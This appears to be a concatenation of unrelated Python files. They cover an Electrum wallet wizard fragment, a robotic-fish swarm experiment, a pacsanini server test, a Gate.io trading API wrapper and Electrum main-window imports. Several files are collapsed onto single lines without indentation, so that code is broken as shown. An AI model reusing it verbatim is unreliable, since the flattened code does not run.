presets=(), warn_issue4566=False): vbox = QVBoxLayout() vbox.addWidget(WWLabel(message)) line = QLineEdit() line.setText(default) def f(text): self.next_button.setEnabled(test(text)) if warn_issue4566: text_whitespace_normalised = ' '.join(text.split()) warn_issue4566_label.setVisible(text != text_whitespace_normalised) line.textEdited.connect(f) vbox.addWidget(line) vbox.addWidget(WWLabel(warning)) warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566) warn_issue4566_label.setVisible(False) vbox.addWidget(warn_issue4566_label) for preset in presets: button = QPushButton(preset[0]) button.clicked.connect(lambda __, text=preset[1]: line.setText(text)) button.setMinimumWidth(150) hbox = QHBoxLayout() hbox.addWidget(button, alignment=Qt.AlignCenter) vbox.addLayout(hbox) self.exec_layout(vbox, title, next_enabled=test(default)) 
return line.text() @wizard_dialog def show_xpub_dialog(self, xpub, run_next): msg = ' '.join([ _("Here is your master public key."), _("Please share it with your cosigners.") ]) vbox = QVBoxLayout() layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False) vbox.addLayout(layout.layout()) self.exec_layout(vbox, _('Master Public Key')) return None def init_network(self, network): message = _("Electrum communicates with remote servers to get " "information about your transactions and addresses. The " "servers all fulfill the same purpose only differing in " "hardware. In most cases you simply want to let Electrum " "pick one at random. However if you prefer feel free to " "select a server manually.") choices = [_("Auto connect"), _("Select server manually")] title = _("How do you want to connect to a server? ") clayout = ChoicesLayout(message, choices) self.back_button.setText(_('Cancel')) self.exec_layout(clayout.layout(), title) r = clayout.selected_index() if r == 1: nlayout = NetworkChoiceLayout(network, self.config, wizard=True) if self.exec_layout(nlayout.layout()): nlayout.accept() else: network.auto_connect = True self.config.set_key('auto_connect', True, True) @wizard_dialog def multisig_dialog(self, run_next): cw = CosignWidget(2, 2) m_edit = QSlider(Qt.Horizontal, self) n_edit = QSlider(Qt.Horizontal, self) n_edit.setMinimum(2) n_edit.setMaximum(15) m_edit.setMinimum(1) m_edit.setMaximum(2) n_edit.setValue(2) m_edit.setValue(2) n_label = QLabel() m_label = QLabel() grid = QGridLayout() grid.addWidget(n_label, 0, 0) grid.addWidget(n_edit, 0, 1) grid.addWidget(m_label, 1, 0) grid.addWidget(m_edit, 1, 1) def on_m(m): m_label.setText(_('Require {0} signatures').format(m)) cw.set_m(m) def on_n(n): n_label.setText(_('From {0} cosigners').format(n)) cw.set_n(n) m_edit.setMaximum(n) n_edit.valueChanged.connect(on_n) m_edit.valueChanged.connect(on_m) on_n(2) on_m(2) vbox = QVBoxLayout() vbox.addWidget(cw) vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:"))) vbox.addLayout(grid) self.exec_layout(vbox, _("Multi-Signature Wallet")) m = int(m_edit.value()) n = int(n_edit.value()) return (m, n)
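# Minimal usage sketch of the @wizard_dialog pattern (the callback and parameter
# values are hypothetical): the decorator reads the 'run_next' keyword argument,
# shows the dialog, turns GoBack/UserCancelled into navigation instead of letting
# them propagate, wraps a non-tuple return value into a 1-tuple, and forwards it
# to run_next.
#
# wizard = InstallWizard(config, app, plugins, storage)
# wizard.line_dialog(run_next=lambda text: print('entered:', text),
#                    title=_('Example'), message=_('Type something'),
#                    default='', test=lambda t: bool(t))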
exp_LJpot.py
import RPi.GPIO as GPIO GPIO.setwarnings(False) GPIO.setmode(GPIO.BCM) import os import time import threading import numpy as np from picamera import PiCamera from lib_utils import * from lib_photodiode import Photodiode from lib_depthsensor import DepthSensor from lib_fin import Fin from lib_leds import LEDS from lib_vision import Vision os.makedirs('./data/{}/'.format(U_FILENAME)) def initialize(): """Initializes all threads which are running fins and a logger instance for the overall status """ threading.Thread(target=caudal.run).start() threading.Thread(target=dorsal.run).start() threading.Thread(target=pecto_l.run).start() threading.Thread(target=pecto_r.run).start() leds.on() time.sleep(1) leds.off() def idle(): """Waiting for starting signal, then signal UUID """ thresh_photodiode = 50 # lights off: 2, lights on: 400 -> better range! while photodiode.brightness > thresh_photodiode: photodiode.update() time.sleep(4) t_blink = time.time() for blink in range(U_UUID): leds.on() time.sleep(0.2) leds.off() time.sleep(0.2) elapsed_time = time.time() - t_blink sleep_time = 12 - elapsed_time time.sleep(sleep_time) # wait such that all robots leave idle before LEDs are on t_start = time.time() return t_start def terminate(): """Terminates all threads which are running fins """ caudal.terminate() dorsal.terminate() pecto_l.terminate() pecto_r.terminate() time.sleep(1) leds.on() time.sleep(1) leds.off() GPIO.cleanup() def log_status(t_passed, depth_mm, target_dist, target_x, target_y, target_z, no_neighbors): """Logs the overall status of BlueBot Args: t_passed (float): Time since the beginning of the experiment, [s] distance (float): Distance to LED pair, [mm] heading (float): x-position of an LED pair, [mm] status (string): Status in the finite state machine """ with open('./data/{}/{}_status.log'.format(U_FILENAME, U_UUID), 'a') as f: f.write('{:.2f},{},{},{},{},{},{}\n'.format(t_passed, depth_mm, round(target_dist), round(target_x), round(target_y), round(target_z), no_neighbors)) def avoid_duplicates_by_angle(): """Use right and left cameras just up to the xz-plane such that the overlapping camera range disappears and there are no duplicates. Returns: tuple: all_blobs (that are valid, i.e. not duplicates) and their all_angles """ right = np.transpose(vision.pqr_r) left = np.transpose(vision.pqr_l) all_blobs = np.empty((3,0)) all_angles = np.empty(0) for r in right: angle = np.arctan2(r[1], r[0]) * 180 / pi if angle > -5: all_blobs = np.append(all_blobs, [[r[0]], [r[1]], [r[2]]], axis=1) all_angles = np.append(all_angles, angle) for l in left: angle = np.arctan2(l[1], l[0]) * 180 / pi if angle < 5: all_blobs = np.append(all_blobs, [[l[0]], [l[1]], [l[2]]], axis=1) all_angles = np.append(all_angles, angle) return (all_blobs, all_angles) def parse(all_blobs, all_angles): """Assigns duos of blobs to single robots Idea: Sort all blobs by the angles/directions they are coming from. Pair duos of blobs that have most similar angles. 
Args: all_blobs (np.array): all valid blobs from both images all_angles (np.array): all angles in xy-plane of all valid blobs Returns: tuple: set of neighbors and dict with their relative positions """ neighbors = set() rel_pos = {} no_blobs = len(all_angles) if no_blobs < 2: # 0 robots return (neighbors, rel_pos) sorted_indices = np.argsort(all_angles) angle_thresh = 5 # below which 2 blobs are considered a duo i = 0 # blob_ind neighbor_ind = 0 while i < no_blobs-1: # iterate through all blobs and fill dict # if 2 blobs are too far apart, ignore first one and check next 2 dangle = abs(all_angles[sorted_indices[i+1]] - all_angles[sorted_indices[i]]) if dangle > angle_thresh: i += 1 continue # else, add 2 blobs b1 = all_blobs[:,sorted_indices[i]] b2 = all_blobs[:,sorted_indices[i+1]] # check for reflections ref = 0 if i+2 < no_blobs-1: dangle = abs(all_angles[sorted_indices[i+2]] - all_angles[sorted_indices[i]]) if dangle < angle_thresh: # a 3rd blob from same direction? ref = 1 b3 = all_blobs[:,sorted_indices[i+2]] # who is closest to the surface? pitch1 = (np.arctan2(b1[2], sqrt(b1[0]**2 + b1[1]**2)) * 180 / pi, 1) pitch2 = (np.arctan2(b2[2], sqrt(b2[0]**2 + b2[1]**2)) * 180 / pi, 2) pitch3 = (np.arctan2(b3[2], sqrt(b3[0]**2 + b3[1]**2)) * 180 / pi, 3) min_pitch = min(pitch1, pitch2, pitch3)[1] # smallest angle (negative) is closest to surface and will be discarded if min_pitch == 1: b1 = b3 elif min_pitch == 2: b2 = b3 if i+3 < no_blobs-1: dangle = abs(all_angles[sorted_indices[i+3]] - all_angles[sorted_indices[i]]) if dangle < angle_thresh: # a 4th blob from same direction? ref = 2 b4 = all_blobs[:,sorted_indices[i+3]] # who is closest to the surface? pitch4 = (np.arctan2(b4[2], sqrt(b4[0]**2 + b4[1]**2)) * 180 / pi, 4) min_pitch = min(pitch1, pitch2, pitch4)[1] # smallest angle (negative) if min_pitch == 1: b1 = b4 elif min_pitch == 2: b2 = b4 # add final duo as neighbor with averaged xyz coordinates pqr = np.transpose(np.vstack((b1, b2))) xyz = vision._pqr_to_xyz(pqr) neighbors.add(neighbor_ind) rel_pos[neighbor_ind] = (xyz[:,0] + xyz[:,1]) / 2 i += 2 + ref neighbor_ind += 1 return(neighbors, rel_pos) def lj_force(neighbors, rel_pos): """Derives the Lennard-Jones potential and force based on the relative positions of all neighbors and the desired target_dist to neighbors. The force is a gain factor, attracting or repelling a fish from a neighbor. The center is a point in space toward which the fish will move, based on the sum of all weighted neighbor positions. Args: neighbors (set): Visible neighbors rel_pos (dict): Relative positions of visible neighbors Returns: np.array: Weighted 3D direction based on visible neighbors """ center = np.zeros((3,)) magn = 0 if not neighbors: return (center, magn) # (a=12,b=6) is standard and ratio has to be 2:1, lower numbers for less aggressive repulsion, e.g. 
(a=6,b=3) a = 12 b = 6 # epsilon and gamma are only scaling factors and without effect after normalization epsilon = 100 # depth of potential well, V_LJ(r_target) = epsilon gamma = 1 # force gain r_target = target_dist r_const = r_target + 2*BL #xx for neighbor in neighbors: r = np.clip(np.linalg.norm(rel_pos[neighbor]), 0.001, r_const) f_lj = -gamma * epsilon /r * (a * (r_target / r)**a - 2 * b * (r_target / r)**b) center += f_lj * rel_pos[neighbor] center /= len(neighbors) magn = np.linalg.norm(center) # normalize center /= magn # normalize return (center, magn) def home(target, magnitude): """Controls the pectoral fins to follow an object using both cameras The "heading" angle towards an object is calculated based on (pqr) coordinates as follows: atan2(r, sqrt(q^2 + p^2)). A positive angle switches the pectoral left fin on turn clockwise. A negative angles switches the pectoral right fin on to turn counterclockwise. Returns: (): Floats to the surface and turns on the spot if no object observed """ caudal_range = 35 # abs(heading) below which caudal fin is switched on freq_c = min(1.5 + 1/250 * magnitude, 2) caudal.set_frequency(freq_c) # blob behind or lost if not target.size: pecto_r.off() pecto_l.off() caudal.off() return # calculate heading heading = np.arctan2(target[1], target[0]) * 180 / pi # target behind if heading > 155 or heading < -155: caudal.off() pecto_r.set_frequency(2.5) pecto_r.on() pecto_l.set_frequency(2.5) pecto_l.on() # target in front elif heading < 10 and heading > -10: pecto_r.off() pecto_l.off() caudal.on() # target to the right elif heading > 10: freq_l = 1 + 1.5 * abs(heading) / 155 pecto_l.set_frequency(freq_l) pecto_l.on() pecto_r.off() if heading < caudal_range: caudal.on() else: caudal.off() # target to the left elif heading < -10: freq_r = 1 + 1.5 * abs(heading) / 155 pecto_r.set_frequency(freq_r) pecto_r.on() pecto_l.off() if heading > -caudal_range: caudal.on() else: caudal.off() def depth_ctrl_from_cam(target): """Controls the diving depth to stay level with an observed object using both cameras. Swithes to depth sensor based depth control when on level with object. The "pitch" angle towards an object is calculated based on (pqr) coordinates as follows: atan2(r, sqrt(p^2 + q^2)). A positive angle switches the dorsal fin on to move down. A negative angles switches the dorsal fin off to move up. 
Returns: (): Floats to the surface if no object observed """ pitch_range = 2 # abs(pitch) below which dorsal fin is not controlled pitch = np.arctan2(target[2], sqrt(target[0]**2 + target[1]**2)) * 180 / pi if pitch > pitch_range: dorsal.on() elif pitch < -pitch_range: dorsal.off() def main(run_time=60): t_passed = 0 iteration = 0 t_main = time.time() - t_start t_change = t_main while t_passed < run_time + t_main: # check environment and find blob centroids of leds try: vision.update() except: continue # find all valid blobs and their respective angles all_blobs, all_angles = avoid_duplicates_by_angle() # match blob duos by angle neighbors, rel_pos = parse(all_blobs, all_angles) # find target move with lj force target, magnitude = lj_force(neighbors, rel_pos) # move home(target, magnitude) depth_ctrl_from_cam(target) # switch behavior if t_passed - t_change > run_time / 2: # set to 2 for plateau #leds.off() global target_dist if target_dist == upper_thresh: target_dist = lower_thresh else: target_dist = upper_thresh t_change = time.time() - t_start #time.sleep(1.5) #leds.on() # update counters t_passed = time.time() - t_start iteration += 1 # log status #if iteration % 2 == 0: depth_sensor.update() depth_mm = max(0, (depth_sensor.pressure_mbar - surface_pressure) * 10.197162129779) log_status(t_passed, depth_mm, target_dist, target[0], target[1], target[2], len(neighbors)) BL = 160 # body length, [mm] max_centroids = 0 # (robots-1)*2, excess centroids are reflections lower_thresh = 0.6*BL upper_thresh = 1.6*BL target_dist = upper_thresh # distance to neighbors, [mm] caudal = Fin(U_FIN_C1, U_FIN_C2, 1.5) # freq, [Hz] dorsal = Fin(U_FIN_D1, U_FIN_D2, 6) # freq, [Hz] pecto_r = Fin(U_FIN_PR1, U_FIN_PR2, 2.5) # freq, [Hz] pecto_l = Fin(U_FIN_PL1, U_FIN_PL2, 2.5) # freq, [Hz] photodiode = Photodiode() leds = LEDS() vision = Vision(max_centroids) # 0 disables reflections() in lib_blob depth_sensor = DepthSensor() depth_sensor.update() surface_pressure = depth_sensor.pressure_mbar initialize() t_start = idle() leds.on() main(240) # run time, [s] leds.off() terminate()
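# Worked sketch of the Lennard-Jones gain used in lj_force (illustrative numbers,
# same constants as above: a=12, b=6, epsilon=100, gamma=1):
#
#   f_lj(r) = -gamma * epsilon / r * (a*(r_target/r)**a - 2*b*(r_target/r)**b)
#
# At r == r_target the two terms cancel, so the gain is 0 (equilibrium spacing);
# for r > r_target the gain is positive (the neighbor attracts);
# for r < r_target the gain is negative (the neighbor repels).
#
# def lj_gain(r, r_target, a=12, b=6, epsilon=100, gamma=1):
#     return -gamma * epsilon / r * (a * (r_target / r)**a - 2 * b * (r_target / r)**b)
#
# print(lj_gain(256.0, 256.0))   # ~0.0  -> equilibrium at the target distance
# print(lj_gain(400.0, 256.0))   # > 0   -> attraction toward the neighbor
# print(lj_gain(150.0, 256.0))   # < 0   -> repulsion away from the neighbor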
net_test.py
# Copyright (C) 2019-2020, Therapixel SA. # All rights reserved. # This file is subject to the terms and conditions described in the # LICENSE file distributed in this package. """Test that the config functionalities of the pacsanini package can be correctly accessed from the command line. """ import socket from threading import Thread from time import sleep import pytest from click.testing import CliRunner from pacsanini.cli.net import echo_cli, server_cli @pytest.mark.cli @pytest.mark.net def test_config_stdout(test_config_path): """Test that the net commands work well.""" runner = CliRunner() result_yaml = runner.invoke(echo_cli, ["--config", test_config_path, "--debug"]) assert result_yaml.exit_code == 0 assert result_yaml.output @pytest.mark.cli class TestStorescpCli: """Test that a storescp server can be instantiated from the command line.""" def setup(self): """Get a hold of the server thread.""" self.server_thread: Thread = None def teardown(self): """Make sure that the server thread will be stopped.""" if self.server_thread is not None and self.server_thread.is_alive(): self.server_thread.join(1) def test_server(self, test_config_path): """Test that a storescp server can be started from the command line. """ def run_server(): runner = CliRunner() result = runner.invoke( server_cli, ["--config", test_config_path, "--debug"] ) assert result.output self.server_thread = Thread(target=run_server, daemon=True) self.server_thread.start() sleep(3) # give time for the server to start with pytest.raises(socket.error): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(("", 104))
vngate.py
# encoding: utf-8 import urllib import sys import json from time import time, sleep from threading import Thread import urllib.parse as urlparse from datetime import datetime import base64 import hmac import hashlib import json import gzip, binascii, os import http.client as httplib import traceback from vnpy.trader.vtFunction import systemSymbolToVnSymbol , VnSymbolToSystemSymbol import json API_QUERY_URL = 'data.gate.io' API_TRADE_URL = 'api.gate.io' FUNCTIONCODE_GET_SYMBOS_GATE = "pairs" FUNCTIONCODE_GET_MARKETINFO_GATE = "marketinfo" # 市场订单参数 FUNCTIONCODE_GET_MARKETLIST_GATE = "marketlist" # 市场详细行情 FUNCTIONCODE_POST_BALANCE_GATE = "balances" FUNCTIONCODE_POST_BUY_GATE = "buy" FUNCTIONCODE_POST_SELL_GATE = "sell" FUNCTIONCODE_POST_CANCEL_ORDERS_GATE = "cancelOrder" FUNCTIONCODE_POST_ORDER_INFO_GATE = "getOrder" FUNCTIONCODE_POST_ORDER_LIST_GATE = "openOrders" FUNCTIONCODE_POST_HISTORY_TRADE = "tradeHistory" ''' 通过 TradeApi完成 ''' class Gate_TradeApi(object): #---------------------------------------------------------------------- def __init__(self): """Constructor""" self.accessKey = '' self.secretKey = '' self.active = False # API工作状态 self.reqID = 0 # 请求编号 #self.reqQueue = Queue() # 请求队列 self.reqQueue = [] # 请求的队列 self.reqThread = Thread(target=self.processQueue) # 请求处理线程 self.account_id = None #---------------------------------------------------------------------- def processRequest(self, req): """处理请求""" # 读取方法和参数 try: url = req['url'] method = req['method'] kwargs = req['kwargs'] resource = req["resource"] data = None if method in [FUNCTIONCODE_GET_SYMBOS_GATE , FUNCTIONCODE_GET_MARKETINFO_GATE]: data = self.httpGet( url, resource, '') elif method in [FUNCTIONCODE_POST_BALANCE_GATE , FUNCTIONCODE_POST_BUY_GATE , FUNCTIONCODE_POST_SELL_GATE , FUNCTIONCODE_POST_CANCEL_ORDERS_GATE , FUNCTIONCODE_POST_HISTORY_TRADE , FUNCTIONCODE_POST_ORDER_INFO_GATE , FUNCTIONCODE_POST_ORDER_LIST_GATE]: data = self.httpPost( url, resource, kwargs ) # 添加额外信息 if method == FUNCTIONCODE_POST_CANCEL_ORDERS_GATE: data["systemID"] = kwargs["orderNumber"] return data except Exception as ex: print(u'processRequest Exception:{},{}'.format(str(ex),traceback.format_exc()),file=sys.stderr) return None #---------------------------------------------------------------------- def processQueue(self): """处理请求队列中的请求""" while self.active: try: if len(self.reqQueue) == 0: sleep(0.1) continue (Type , req) = self.reqQueue[0] callback = req['callback'] reqID = req['reqID'] try: data = self.processRequest(req) # 请求成功 if data != None : callback(data, req, reqID) except Exception as ex: print(u'processQueue1 Exception:{},{}'.format(str(ex), traceback.format_exc()), file=sys.stderr) self.reqQueue.pop(0) sleep(0.1) except Exception as ex: print(u'processQueue2 Exception:{},{}'.format(str(ex), traceback.format_exc()), file=sys.stderr) #---------------------------------------------------------------------- def is_same_req(self, req1 , req2): flag = False try: if req1["kwargs"]["orderNumber"] == req2["kwargs"]["orderNumber"]: return True except Exception as ex: print( "Error in is_same_req , req1:{} , req2:{}, ex:{}".format(req1 , req2,str(ex))) return flag #---------------------------------------------------------------------- def sendRequest(self, url , resource , method, callback, kwargs = None,optional=None): """发送请求""" # 请求编号加1 self.reqID += 1 # 生成请求字典并放入队列中 req = {} req['url'] = url req['resource'] = resource req['method'] = method req['callback'] = callback req['optional'] = optional req['kwargs'] = kwargs req['reqID'] = 
self.reqID if method in [ FUNCTIONCODE_POST_BALANCE_GATE , FUNCTIONCODE_POST_ORDER_LIST_GATE]: flag = False for use_method ,r in self.reqQueue: if use_method == method: flag = True break if False == flag: self.reqQueue.append( (method , req)) elif method in [ FUNCTIONCODE_POST_CANCEL_ORDERS_GATE , FUNCTIONCODE_POST_ORDER_INFO_GATE]: flag = False for use_method, r in self.reqQueue: if use_method == method: if self.is_same_req( r , req) == True: flag = True break if False == flag: self.reqQueue.append( (method , req)) else: self.reqQueue.append( (method , req)) #self.reqQueue.put(req) # 返回请求编号 return self.reqID #---------------------------------------------------------------------- #################################################### ## 主动函数 #################################################### #---------------------------------------------------------------------- def init(self, accessKey, secretKey): """初始化""" self.accessKey = accessKey self.secretKey = secretKey self.active = True self.reqThread.start() #---------------------------------------------------------------------- def exit(self): """退出""" self.active = False if self.reqThread.isAlive(): self.reqThread.join() #---------------------------------------------------------------------- def getSign(self, params, secretKey): bSecretKey = secretKey.encode(encoding='UTF-8') sign = '' for key in params.keys(): value = str(params[key]) sign += key + '=' + value + '&' sign = sign[:-1] bSign = sign.encode(encoding='UTF-8') mySign = hmac.new(bSecretKey, bSign, hashlib.sha512).hexdigest() return mySign #---------------------------------------------------------------------- def httpGet(self, url, resource, params=''): conn = httplib.HTTPSConnection(url, timeout=10) conn.request("GET", resource + '/' + params) response = conn.getresponse() data = response.read().decode('utf-8') return json.loads(data) #---------------------------------------------------------------------- def httpPost(self, url, resource, params ): headers = { "Accept": "application/json", 'Content-Type': 'application/x-www-form-urlencoded', "User-Agent": "Chrome/39.0.2171.71", "KEY":self.accessKey, "SIGN":self.getSign(params, self.secretKey) } conn = httplib.HTTPSConnection(url, timeout=10 ) tempParams = urllib.parse.urlencode(params) if params else '' conn.request("POST", resource, tempParams, headers) response = conn.getresponse() data = response.read().decode('utf-8') conn.close() return json.loads(data) #---------------------------------------------------------------------- def get_symbols(self): print(u'get_symbols') return self.sendRequest( API_QUERY_URL , "/api2/1/pairs" , FUNCTIONCODE_GET_SYMBOS_GATE , self.onAllSymbols , kwargs = {} , optional = None) #---------------------------------------------------------------------- def get_market_info(self): print(u'get_market_info') return self.sendRequest( API_QUERY_URL , "/api2/1/marketinfo" , FUNCTIONCODE_GET_MARKETINFO_GATE , self.onMarketInfo , kwargs = {} , optional = None) #---------------------------------------------------------------------- def get_balance(self): # print(u'get_balance') return self.sendRequest( API_TRADE_URL , "/api2/1/private/balances" ,FUNCTIONCODE_POST_BALANCE_GATE , self.onBalances , kwargs = {} , optional = None) #---------------------------------------------------------------------- def spotBuy(self , symbol, rate, amount): print(u'spotBuy(self , %s, %s, %s)' % ( symbol, str(rate), str(amount))) kwargs = {'currencyPair': symbol,'rate':rate, 'amount':amount} return self.sendRequest( API_TRADE_URL , 
"/api2/1/private/buy" , FUNCTIONCODE_POST_BUY_GATE , self.onSpotTrade , kwargs = kwargs , optional = None) #---------------------------------------------------------------------- def spotSell(self , symbol, rate, amount): print(u'spotSell(self , %s, %s, %s)' % (symbol , str(rate) , str(amount))) kwargs = {'currencyPair': symbol,'rate':rate, 'amount':amount} return self.sendRequest( API_TRADE_URL , "/api2/1/private/sell" , FUNCTIONCODE_POST_SELL_GATE , self.onSpotTrade , kwargs = kwargs , optional = None) #---------------------------------------------------------------------- def spotTrade(self, symbol , amount, _type , price ): if _type == "buy": return self.spotBuy( symbol , price , amount ) elif _type == "sell": return self.spotSell( symbol , price , amount ) else: return None #---------------------------------------------------------------------- def cancel_order(self , symbol , order_id): # print(u'cancel_order(self , %s , %s)' % (symbol , str(order_id))) kwargs = {"currencyPair" : symbol , "orderNumber" : order_id} return self.sendRequest( API_TRADE_URL ,"/api2/1/private/cancelOrder" , FUNCTIONCODE_POST_CANCEL_ORDERS_GATE , self.onCancelOrder , kwargs = kwargs , optional = None ) #---------------------------------------------------------------------- def getOrder( self, symbol , order_id ): # print(u'getOrder( self, %s , %s )' % (symbol , order_id)) kwargs = {"currencyPair" : symbol , "orderNumber" : order_id} return self.sendRequest( API_TRADE_URL , "/api2/1/private/getOrder" , FUNCTIONCODE_POST_ORDER_INFO_GATE , self.onOrderInfo , kwargs = kwargs , optional = None) #---------------------------------------------------------------------- def listTradeHistory(self , symbol ): kwargs = {"currencyPair" : symbol } return self.sendRequest( API_TRADE_URL , "/api2/1/private/tradeHistory" , FUNCTIONCODE_POST_HISTORY_TRADE , self.onTradeList , kwargs = kwargs , optional = None) #---------------------------------------------------------------------- def listOpenOrders( self): # print(u'listOpenOrders( self)') return self.sendRequest( API_TRADE_URL , "/api2/1/private/openOrders" , FUNCTIONCODE_POST_ORDER_LIST_GATE , self.onOrderList , kwargs = {} , optional = None) #---------------------------------------------------------------------- def onBalances(self,data, req, reqID): print(u'onBalances(self, data, req, reqID)') print(data) # ---------------------------------------------------------------------- def onAllSymbols(self,data, req, reqID): print(u'onAllSymbols(self, data, req, reqID)') print(data) #---------------------------------------------------------------------- def onMarketInfo(self,data, req, reqID): print(u'onMarketInfo(self, data, req, reqID)') print(data) #---------------------------------------------------------------------- def onSpotTrade(self,data, req, reqID): print(u'onSpotTrade(self, data, req, reqID)') print(data) #---------------------------------------------------------------------- def onCancelOrder(self,data, req, reqID): print(u'onCancelOrder(self, data, req, reqID)') print(data) #---------------------------------------------------------------------- def onOrderInfo(self,data, req, reqID): print(u'onOrderInfo(self, data, req, reqID)') print(data) #---------------------------------------------------------------------- def onOrderList(self,data, req, reqID): print(u'onOrderList(self, data, req, reqID)') print(data) #---------------------------------------------------------------------- def onTradeList(self,data, req, reqID): print(u'onTradeList(self, data, req, reqID)') 
        print(data)


'''
Implemented via DataApi
'''
class Gate_DataApi(object):
    #----------------------------------------------------------------------
    def __init__(self):
        """Constructor"""
        self.active = False
        self.taskInterval = 3                       # delay between polling rounds, in seconds
        self.taskList = []                          # list of subscribed tasks
        self.taskThread = Thread(target=self.run)   # thread that processes the tasks

    #----------------------------------------------------------------------
    def init(self, interval, debug):
        """Initialize"""
        self.taskInterval = interval
        self.DEBUG = debug

        self.active = True
        self.taskThread.start()

    #----------------------------------------------------------------------
    def exit(self):
        """Exit"""
        self.active = False

        if self.taskThread.isAlive():
            self.taskThread.join()

    #----------------------------------------------------------------------
    def run(self):
        """Run continuously"""
        while self.active:
            for url, resource, callback, params in self.taskList:
                try:
                    data = self.http_get_request(url, resource, params)
                    if isinstance(data, dict):
                        data["currencyPair"] = params
                    callback(data)
                except Exception as ex:
                    print(u'run exception:{},{}'.format(str(ex), traceback.format_exc()), file=sys.stderr)

            sleep(self.taskInterval)

    # ----------------------------------------------------------------------
    def http_get_request(self, url, resource, params):
        conn = httplib.HTTPSConnection(url, timeout=10)
        conn.request("GET", resource + '/' + params)
        try:
            response = conn.getresponse()
            data = response.read().decode('utf-8')
            return json.loads(data)
        except Exception as e:
            print("httpGet failed, detail is:%s" % e)
            return {"status": "fail", "msg": e}

    #----------------------------------------------------------------------
    def subscribeTick(self, symbol):
        """Subscribe to real-time ticker data"""
        url = "/api2/1/ticker"
        task = (API_QUERY_URL, url, self.onTick, symbol)
        self.taskList.append(task)

    #----------------------------------------------------------------------
    def subscribeTrades(self, symbol):
        """Subscribe to real-time trade data"""
        url = "/api2/1/tradeHistory"
        task = (API_QUERY_URL, url, self.onTrades, symbol)
        self.taskList.append(task)

    #----------------------------------------------------------------------
    def subscribeOrderbooks(self, symbol):
        """Subscribe to real-time order book data"""
        url = "/api2/1/orderBook"
        task = (API_QUERY_URL, url, self.onDepth, symbol)
        self.taskList.append(task)

    #----------------------------------------------------------------------
    def onTick(self, data):
        """Real-time ticker push"""
        print(data)

    #----------------------------------------------------------------------
    def onTrades(self, data):
        """Real-time trade push"""
        print(data)

    #----------------------------------------------------------------------
    def onDepth(self, data):
        """Real-time order book push"""
        print(data)
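# Minimal sketch of the request signing done in Gate_TradeApi.getSign: the POST
# parameters are joined as 'k1=v1&k2=v2&...' (in dict insertion order, without URL
# encoding) and signed with HMAC-SHA512 using the secret key; the hex digest is sent
# in the SIGN header alongside the KEY header. The key values below are placeholders.
#
# import hashlib, hmac
#
# params = {'currencyPair': 'eth_usdt', 'orderNumber': '12345'}
# payload = '&'.join('{}={}'.format(k, v) for k, v in params.items())
# sign = hmac.new(b'my-secret-key', payload.encode('utf-8'), hashlib.sha512).hexdigest()
# headers = {'KEY': 'my-access-key', 'SIGN': sign}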
main_window.py
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.

import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union

from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
                             QMenuBar, QFileDialog, QCheckBox, QLabel,
                             QVBoxLayout, QGridLayout, QLineEdit,
                             QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
                             QShortcut, QMainWindow, QCompleter, QInputDialog,
                             QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
                             QMenu, QAction, QStackedWidget, QToolButton)

import electrum
from electrum.gui import messages
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
                      paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time, UserCancelled, profiler,
                           bh2u, bfh, InvalidPassword,
                           UserFacingException,
                           get_new_wallet_name, send_exception_to_crash_reporter,
                           InvalidBitcoinURI, maybe_extract_bolt11_invoice,
                           NotEnoughFunds, NoDynamicFeeEstimates,
                           MultipleSpendMaxTxOutputs, AddTransactionException,
                           BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
                                  PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
                             sweep_preparations, InternalAddressCorruption,
                             CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
                              UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException

from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
